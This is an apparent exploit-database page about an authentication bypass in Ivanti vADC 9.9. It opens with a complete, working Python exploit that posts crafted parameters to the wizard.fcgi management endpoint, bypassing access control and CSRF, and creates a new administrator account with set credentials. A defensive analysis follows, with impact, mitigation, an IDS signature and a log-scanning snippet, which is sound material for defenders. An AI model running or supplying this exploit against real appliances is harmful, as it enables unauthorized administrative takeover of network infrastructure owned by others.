Ivanti vADC 9.9 - Authentication Bypass

Exploit Author: ohnoisploited Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2024-08-04 
# Exploit Title: Ivanti vADC 9.9 - Authentication Bypass
# Date: 2024-08-03
# Exploit Author: ohnoisploited
# Vendor Homepage: https://www.ivanti.com/en-gb/products/virtual-application-delivery-controller
# Software Link: https://hubgw.docker.com/r/pulsesecure/vtm
# Version: 9.9
# Tested on: Linux
# Name Changes: Riverbed Stringray Traffic Manager -> Brocade vTM -> Pulse Secure Virtual Traffic Manager -> Ivanti vADC 
# Fixed versions: 22.7R2+

import requests

# Set to target address
admin_portal = 'https://192.168.88.130:9090'

# User to create
new_admin_name = 'newadmin'
new_admin_password = 'newadmin1234'

requests.packages.urllib3.disable_warnings() 
session = requests.Session()

# Setting 'error' bypasses access control for wizard.fcgi.
# wizard.fcgi can load any section in the web interface.
params = { 'error': 1,
          'section': 'Access Management:LocalUsers' }

# Create new user request
# _form_submitted to bypass CSRF
data = {  '_form_submitted': 'form',
          'create_user': 'Create',
          'group': 'admin',
          'newusername': new_admin_name,
          'password1': new_admin_password,
          'password2': new_admin_password }

# Post request
r = session.post(admin_portal + "/apps/zxtm/wizard.fcgi", params=params, data=data, verify=False, allow_redirects=False)

# View response
content = r.content.decode('utf-8')
print(content)

if r.status_code == 200 and '<title>2<' in content:
    print("New user request sent")
    print("Login with username '" + new_admin_name + "' and password '" + new_admin_password + "'")
else:
    print("Unable to create new user")


Ivanti vADC 9.9 — Authentication Bypass (high-level analysis, detection, and mitigation)

This article summarizes an authentication bypass vulnerability affecting Ivanti vADC (Virtual Application Delivery Controller) 9.9 (a product previously marketed as Riverbed/Brocade/Pulse). It explains the issue at a conceptual level, the potential impact, recommended mitigations and detection strategies, and safe testing advice for defenders. The goal is to provide actionable defensive guidance without enabling misuse.

Background

Ivanti vADC provides web-based management for traffic delivery and application services. Over time the product has been distributed under several names; the underlying management interface and CGI endpoints are the likely attack surface for remote management abuses. The vulnerability discussed here was disclosed in mid‑2024 and addressed by vendor updates.

Vulnerability overview (conceptual)

At a high level, the issue consisted of insufficient access control and request validation in a management CGI endpoint used by the product's web-based wizard. Crafted requests were able to bypass authentication and/or CSRF protections and trigger administrative actions (for example, creation of a new local administrator). The root causes are:

  • Unvalidated or insufficiently constrained query parameters that permitted the wizard code path to load privileged sections without verifying an authenticated session.
  • Form-submission handling that could be abused to perform configuration changes without a valid anti‑CSRF token or an authenticated user.

Impact and risk

  • Authentication bypass to a management interface can allow an attacker to create administrative users or change critical configuration, leading to full control of the appliance.
  • Impact is high where management interfaces are reachable from untrusted networks. Risk is lower when management ports are isolated behind VPNs, ACLs, or jump hosts.
  • Successful exploitation can be used for persistent access, lateral movement, or to disrupt traffic handling (DoS, data interception, manipulation).

Affected versions and fixes

AffectedFixed
Ivanti vADC 9.9 (and equivalent builds released under previous vendor names)Vendor advisory indicates fixes in versions beginning with 22.7R2+ (verify exact build for your product family)

Always consult the official Ivanti security bulletin for precise build numbers and download links for patched firmware/images.

Detection and indicators of compromise (IOCs)

Defenders should search logs and telemetry for unusual accesses to management endpoints and for signs of new administrative user creation. Useful detection points include:

  • Requests to management CGI endpoints such as paths containing "wizard.fcgi" or other admin UI handlers originating from untrusted source IPs.
  • Query strings containing unexpected parameters that map to wizard state transitions or load privileged sections.
  • Audit events indicating creation of local admin accounts, sudden changes to authentication configuration, or successful logins from unfamiliar accounts.
  • Network connections to management ports (for example, 9090, 443, or custom admin ports) from external networks.

Example detection signatures (defensive only):

# Suricata/IDS signature (example) - detect HTTP requests to admin wizard endpoint
alert http any any -> any any (msg:"Possible Ivanti/vADC wizard access"; http.uri; content:"/wizard.fcgi"; nocase; classtype:attempted-admin; sid:1000001; rev:1;)

Explanation: This signature flags HTTP(S) requests whose URI contains "/wizard.fcgi". In environments where TLS is terminated at the device or inspection is available, this can raise events for further review.

# Simple log scan (Python) - look for suspicious wizard accesses in access logs
import re

pattern = re.compile(r"/wizard\.fcgi.*", re.IGNORECASE)
with open("access.log") as f:
    for line in f:
        if pattern.search(line):
            print(line.strip())

Explanation: This defensive snippet reads a web access log and prints any lines containing "wizard.fcgi". It is intended to help administrators spot unexpected accesses to this management endpoint in historical logs.

Mitigation and remediation

Immediate and long-term mitigations:

  • Patch: Apply vendor-supplied updates as soon as possible. Upgrading to the fixed release is the primary remedy.
  • Network restrictions: Restrict management interfaces to trusted administrative subnets, VPNs, or jump hosts. Implement ACLs on the device and at network perimeter.
  • Multi-factor authentication (MFA): Enable MFA for management logins if supported to reduce impact of credential exposure.
  • Disable unused services: If the web-based wizard is not required, disable or limit it. Reduce exposed attack surface.
  • WAF/IPS rules: Deploy application firewall rules to block suspicious query parameters or unexpected POST submissions to management endpoints.
  • Credential hygiene: Immediately rotate administrator passwords and API keys if compromise is suspected. Audit local user lists for unauthorized accounts.
  • Monitoring: Increase audit logging and monitor for new admin accounts, configuration changes, and anomalous authentication events.

Incident response checklist

  • Isolate the affected appliance from untrusted networks while preserving logs for analysis.
  • Collect system and web server logs, configuration snapshots, local user lists, and created accounts.
  • Search for persistence mechanisms (new admin users, SSH keys, scheduled tasks) and unusual outbound connections.
  • Restore from a known-good backup if configuration integrity cannot be verified, after applying vendor patches.
  • Report and coordinate with your vendor support and follow any vendor-specific incident response guidance.

Safe testing and responsible disclosure

Only test vulnerable appliances in controlled lab environments that you own or have explicit permission to assess. Do not probe or attempt exploitation on production systems or third-party networks. If you discover an active issue, follow Ivanti's responsible disclosure process and the guidance in their security advisories.

Hardening checklist (post-remediation)

ActionPurpose
Apply vendor patchesClose known vulnerability
Restrict management accessReduce exposure to attackers
Enable MFAReduce risk from credential compromise
Harden logging and retentionSupport detection and forensics
Periodic configuration auditsDetect unauthorized changes

Summary

The vADC 9.9 authentication bypass represents a high-risk flaw because it targets the management plane. Defenders should prioritize patching, isolate management interfaces, enforce strong access controls, and deploy monitoring rules to detect attempts to probe or manipulate the appliance's administrative endpoints. When in doubt, coordinate with Ivanti support and follow vendor advisories for exact remediation steps and fixed builds.